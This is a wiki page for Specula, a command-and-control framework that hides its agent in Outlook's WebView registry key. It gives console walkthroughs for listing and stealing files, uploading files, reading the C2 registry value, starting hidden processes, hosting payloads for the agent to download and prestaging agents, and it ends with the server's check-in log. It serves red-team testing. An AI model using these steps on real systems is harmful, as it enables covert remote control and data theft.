-
Notifications
You must be signed in to change notification settings - Fork 19
Example Scenarios and usage
Oddvar Moe edited this page Jul 29, 2024
·
3 revisions
A tutorial video on using modules can be found here on Youtube: https://www.youtube.com/watch?v=edJ_cRW5aQM&list=PLk-dPXV5k8SE_g2507i2Qsu-dj3nRnTgA&index=5
SpeculaC2:hostname>usemodule operation/file/list_dir
SpeculaC2:hostname:operation/file/list_dir>set directory c:\
SpeculaC2:hostname:operation/file/list_dir>run
Module operation/file/list_dir added to execution queue
SpeculaC2:hostname>data
07/24/2024-07:58:19 -- operation/file/list_dir
Parent Folder: c:\
F: C:\DumpStack.log.tmp - Size: 0mb - LastModified: 7/23/2024 1:20:25 AM
F: C:\pagefile.sys - Size: 3200mb - LastModified: 7/23/2024 1:20:25 AM
F: C:\swapfile.sys - Size: 256mb - LastModified: 7/23/2024 1:20:25 AM
D: C:\$Recycle.Bin - LastModified: 7/22/2024 11:45:41 AM
D: C:\$WinREAgent - LastModified: 7/23/2024 12:35:52 AM
D: C:\Documents and Settings - LastModified: 8/29/2022 11:49:04 PM
D: C:\MSOCache - LastModified: 9/22/2022 9:03:49 PM
D: C:\PerfLogs - LastModified: 12/7/2019 11:14:52 AM
D: C:\Program Files - LastModified: 6/24/2024 5:40:27 PM
D: C:\Program Files (x86) - LastModified: 4/17/2024 12:16:10 AM
D: C:\ProgramData - LastModified: 5/2/2024 10:54:50 PM
D: C:\Recovery - LastModified: 4/12/2024 1:52:38 PM
D: C:\SQL2022 - LastModified: 5/1/2024 1:58:39 AM
D: C:\System Volume Information - LastModified: 8/29/2022 2:49:13 PM
D: C:\temp - LastModified: 7/24/2024 1:58:08 PM
D: C:\Users - LastModified: 7/22/2024 11:44:32 AM
D: C:\Windows - LastModified: 7/23/2024 1:19:44 AM
We want to look inside c:\temp
SpeculaC2:hostname>usemodule operation/file/list_dir
SpeculaC2:hostname:operation/file/list_dir>set directory c:\temp
SpeculaC2:hostname:operation/file/list_dir>run
Module operation/file/list_dir added to execution queue
SpeculaC2:hostname>data
07/24/2024-07:59:29 -- operation/file/list_dir
Parent Folder: c:\temp
F: C:\temp\importantfile.txt - Size: 0mb - LastModified: 7/22/2024 1:19:18 PM
We now want to download that file
SpeculaC2:hostname>usemodule operation/file/get_file
SpeculaC2:hostname:operation/file/get_file>set file c:\temp\importantfile.txt
SpeculaC2:hostname:operation/file/get_file>set destination /tmp/importantfile.txt
SpeculaC2:hostname:operation/file/get_file>run
Module operation/file/get_file added to execution queue
SpeculaC2:hostname>07/24/2024-08:01:00 - hostname: Finished downloading file "c:\temp\importantfile.txt" it was written to /tmp/importantfile.txt
SpeculaC2:hostname>usemodule operation/file/put_file
SpeculaC2:hostname:operation/file/put_file>set file /tmp/file2upload.txt
SpeculaC2:hostname:operation/file/put_file>set destination c:\temp\file2upload.txt
SpeculaC2:hostname:operation/file/put_file>run
Module operation/file/put_file added to execution queue
SpeculaC2:hostname>07/24/2024-08:02:30 - Finished uploading file to hostname at c:\temp\file2upload.txt - Sizes match: server:7 - agent:7
SpeculaC2:hostname>usemodule operation/registry/getallvaluesregistry
SpeculaC2:hostname:operation/registry/getallvaluesregistry>set Root HKCU
SpeculaC2:hostname:operation/registry/getallvaluesregistry>set PathToKey SOFTWARE\Microsoft\Office\16.0\Outlook\webview\Inbox
SpeculaC2:hostname:operation/registry/getallvaluesregistry>run
Module operation/registry/getallvaluesregistry added to execution queue
SpeculaC2:hostname>data
07/24/2024-08:04:20 -- operation/registry/getallvaluesregistry
Path: HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\webview\Inbox
ValueName: url
RegType: REG_SZ
Value: http://192.168.86.245/css/Yc5JkyYCXeJ3qA
Path: HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\webview\Inbox
ValueName: security
RegType: REG_SZ
Value: yes
The module demonstrated here will start the process hidden from the user.
Lets start notepad.exe as an example.
SpeculaC2:hostname>usemodule execute/host/spawnproc_explorer
SpeculaC2:hostname:execute/host/spawnproc_explorer>set command c:\windows\notepad.exe
SpeculaC2:hostname:execute/host/spawnproc_explorer>run
Lets start msiexec.exe /? as an example.
SpeculaC2:hostname>usemodule execute/host/spawnproc_explorer
SpeculaC2:hostname:execute/host/spawnproc_explorer>set command c:\windows\system32\msiexec.exe
SpeculaC2:hostname:execute/host/spawnproc_explorer>set arguments /?
SpeculaC2:hostname:execute/host/spawnproc_explorer>run
Get the PID of the process first. Lets target the msiexec process we started.
SpeculaC2:hostname>usemodule enumerate/host/list_processes
SpeculaC2:hostname:enumerate/host/list_processes>run
SpeculaC2:hostname>data
<SNIP>
PID PPID Arch ProcessName Executable Path
8500 2848 x64 Taskmgr.exe
7096 696 x64 svchost.exe
9956 2848 x64 msiexec.exe C:\windows\system32\msiexec.exe
</SNIP>
SpeculaC2:hostname>usemodule execute/host/wmi_killprocpid
SpeculaC2:hostname:execute/host/wmi_killprocpid>set pid 9956
SpeculaC2:hostname:execute/host/wmi_killprocpid>run
Prepared a file under /tmp/filetohost.txt that we will download to the agent.
SpeculaC2>payload
SpeculaC2:payload>add /tmp/filetohost.txt
SpeculaC2:payload>list
id url sourcepath
fLSbQ4Z1 http://192.168.86.245/GvTEg7Eu7m/fLSbQ4Z1 /tmp/filetohost.txt
Go into the interact menu of the agent.
SpeculaC2:hostname>usemodule operation/file/download_filehttp
SpeculaC2:hostname:operation/file/download_filehttp>set url http://192.168.86.245/GvTEg7Eu7m/fLSbQ4Z1
SpeculaC2:hostname:operation/file/download_filehttp>run
Go to main specula menu (use back).
SpeculaC2>payload
SpeculaC2:payload>list
id url sourcepath
fLSbQ4Z1 http://192.168.86.245/GvTEg7Eu7m/fLSbQ4Z1 /tmp/filetohost.txt
SpeculaC2:payload>remove fLSbQ4Z1
Removed imported payload from DB and filesystem
Sometimes when we test stuff we want to start over so here are the steps needed to reset Specula. First you should remove the URL value in registry of all your agents. Next on the server you do:
SpeculaC2>resetdb
Are you sure you want to delete all agents from database?
A PREFERRED WAY WOULD BE TO RUN THE TASK: Exe - Remove Homepage on each agent.
You will not be able to recover this after you answer yes.
You have been WARNED!
Type YES to confirm (needs to be uppercase) - Anything else will exit without deleting
YES
Removed all data from agents.db
You have now deleted all the data from the database. In order to delete all collected data from the agents, you will need to exit out of Specula and in the filesystem go into the agent_data folder and remove *.txt.
To delete all logs as well, you will need to delete the following files:
- weblog.log
- specula_log.txt
- operator_log.txt
If you also want to start over with the config you will need to delete the specConfig.ini file as well.
You should now have a fresh Specula running again.
The purpose of prestaging to avoid the entire approve process and go straight to a fully agent after a few checkins. Doing a prestage will generate a unique url and decryption key that can be set on an agent directly.
SpeculaC2>prestage
SpeculaC2:prestage>new
Encryptionkey: kP1knw8iHNtcUA0MtusdcA Url:http://192.168.86.245/css/Qlwg0DWsXMUXCQ
The encryption key is then set on the agent under the location you have specified during the setup of Specula (Encryptionkey Registry Location). The url should go in the standard location HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\Webview\Inbox on the URL value.
Once you have started the agent using the prestaged url and encryption key you should see the following in the log:
SpeculaC2>log
07/24/2024-09:04:38 - *** [INBOUND GET] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240): Valid Useragent
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Unique Agent URL triggered
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Updating Lastseen, Useragent and callback count
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Prestaged agents first checkin, executing special task to update database
07/24/2024-09:04:38 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Agent Connected
07/24/2024-09:04:43 - *** [INBOUND GET] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ/np4VYEI
07/24/2024-09:04:43 - *** [AGENTCOM] (192.168.86.240): Valid Useragent
07/24/2024-09:05:13 - *** [INBOUND GET] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ/OdgXDRqb
07/24/2024-09:05:13 - *** [AGENTCOM] (192.168.86.240): Valid Useragent
07/24/2024-09:05:13 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Requesting Encrypted Code
07/24/2024-09:05:13 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Found queued task to execute - enumerate/host/list_basic
07/24/2024-09:05:14 - *** [INBOUND POST] (192.168.86.240) - [URL]: http://192.168.86.245/css/Qlwg0DWsXMUXCQ
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Data returned from agent
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240): RETURN DATA - 3E2354192016550C726E071330224521155817010E2E665A720403074D1D2D3C3A0238240A6D3030202F370E3B7D00232D330F241B437E36262442091B18120D0D7B4B14743825237739657F3C2011767D1E797F261706332F1E622F011A5900267454341A137B0A263A26346E4B273F560400574B0C3A3811116F616C113030202F370E3B7D00232D330F241B437E2B3A2C553D15011B5E431D3E2354191D2B4B192D2D010F346C5428191A7E6E36320E226119011151052D7454206F1D653E1107003810310E3344070F5A5C0C25217969584B
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240) (csmrnyxsc8): Data written to agent_data/csmrnyxsc8.txt
07/24/2024-09:05:14 - *** [AGENTCOM] (192.168.86.240) (DESKTOP-1HCD7MS): Removed executed task from queue
The reason for this is to update the actual computer name and basic information into the database.